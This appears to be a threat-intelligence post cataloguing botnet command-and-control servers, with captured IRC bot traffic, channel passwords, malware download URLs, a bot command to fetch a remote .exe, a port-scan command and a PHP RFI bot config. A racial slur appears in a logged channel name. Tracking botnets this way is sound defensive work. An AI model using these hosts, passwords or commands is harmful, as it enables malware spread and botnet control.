Another HTTP malware spreading around
Panel: http://188.247.135.32/signin.php
Network Activity:
Host Name IP Address
tretr23.com tretr23.com 188.247.135.32
Download URLs
http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com)
Outgoing connection to remote server: tretr23.com TCP port 80
Host Name IP Address
ytreytre.com ytreytre.com 94.63.240.235
Download URLs
http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com)
Outgoing connection to remote server: ytreytre.com TCP port 80
Host Name IP Address
tretr23.com tretr23.com 188.247.135.32
negro001.com(ngrBot hosted in Seychelles Ideal Solution Ltd)
Resolved : [negro001.com] To [193.107.16.131]
Resolved : [negro001.com] To [92.241.165.152]
Remote Host Port Number
199.15.234.7 80
92.241.165.152 8782 ircd here
193.107.16.131 8782 ircd here
NICK [USA|635435]
USER 8770 "" "lol" :8770
JOIN #moo
PONG :Threat-Expert.net
NICK {iNF-00-USA-XP-COMP-7188}
JOIN #hold nigger
PONG Threat-Expert.net
USER blaze * 0 :COMP
hosting infos: http://whois.domaintools.com/193.107.16.131
208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)
Remote Host Port Number
208.67.252.118 2345
NICK [USA|00|P|65160]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-2443 * 0 :COMPUTERNAME
MODE [USA|00|P|65160] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos: http://whois.domaintools.com/208.67.252.118
www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Remote Host Port Number
213.202.225.40 80
213.202.225.48 80
74.206.242.164 80
46.45.164.166 81 IRCD HERE
NICK [N00_USA_XP_8072956]
JOIN #c
MODE [00_USA_XP_9406831] -ix
USER SP2-351 * 0 :COMPUTERNAME
PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe
PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads.
PRIVMSG #c :scan;
188.190.96.148(irc botnet hosted in Ukraine Infium Ltd)
Remote Host Port Number
188.190.96.148 8087 PASS bich99
199.15.234.7 80
NICK n{US|XPa}mlqlmaj
USER mlqlmaj 0 0 :mlqlmaj
JOIN #cash bich99
JOIN #US
hosting infos: http://whois.domaintools.com/188.190.96.148
178.63.199.34(3vbot hosted in Germany Gunzenhausen Hetzner Online Ag)
Remote Host Port Number
178.63.199.34 6667
199.15.234.7 80
NICK New{US-XP-x86}4687226
USER 4687226 "" "4687226" :4687226
MODE New{US-XP-x86}4687226 +iMm
JOIN #|3vbot|#
PONG :irc.priv8net.com
hosting infos: http://whois.domaintools.com/178.63.199.34
java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)
Albanian lamers hosting RFI bots for DDoS
var $config = array("server"=>"java.alb-team.com",
                    "port"=>4242,
                    "pass"=>"", //
                    "prefix"=>"",
                    "maxrand"=>7,
                    "chan"=>"#bote",
                    "key"=>"142536", //
                    "modes"=>"-x+i",
                    "password"=>"bomp", //
                    "trigger"=>"!say@",
                    "hostauth"=>"*" // *
hosting infos: http://whois.domaintools.com/66.78.3.76
87.251.154.156(ngrBot hosted in Russian Federation Moscow Anders Telecom Ltd)
Remote Host Port Number
199.15.234.7 80
87.251.154.156 1890 PASS r00l
NICK n{US|XPa}mqecvfh
USER mqecvfh 0 0 :mqecvfh
JOIN #bots r00l
latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)
Resolved : [latincrew.biz] To [92.241.165.124]
Other domains used to control bots:
xsstorm.com 87.255.51.229
latincrew.biz 92.241.165.124
gu1d3sh3n.cz.cc 178.238.36.17
92.241.165.124 1234 PASS xxx
NICK NEW-[USA|00|P|01507]
USER XP-5713 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|01507] -ix
JOIN #!nw! test
PONG 22 MOTD
exe file: Download Download
UPDATE: 64.202.107.109 1234
Now talking in #!nw!
Topic On: [ #!nw! ] [ .g.f
xD.a7aneek.net(80-100k ngrBotnet hosted in France Paris Gandi)
Same lamer with big net and still hosting with Gandi.net
Resolved : [xD.a7aneek.net] To [92.243.17.156]
Resolved : [xD.a7aneek.net] To [92.243.25.164]
Resolved : [xD.a7aneek.net] To [92.243.0.109]
Resolved : [xD.a7aneek.net] To [92.243.27.72]
Resolved : [xD.a7aneek.net] To [92.243.10.12]
Other domain names used to control bots:
xD.0dayx.com
appupdate.org
xD.0days.me
92.243.10.12 5900 PASS ngrBot
92.243.0.109 5900 PASS ngrBot
92.243.27.72 5900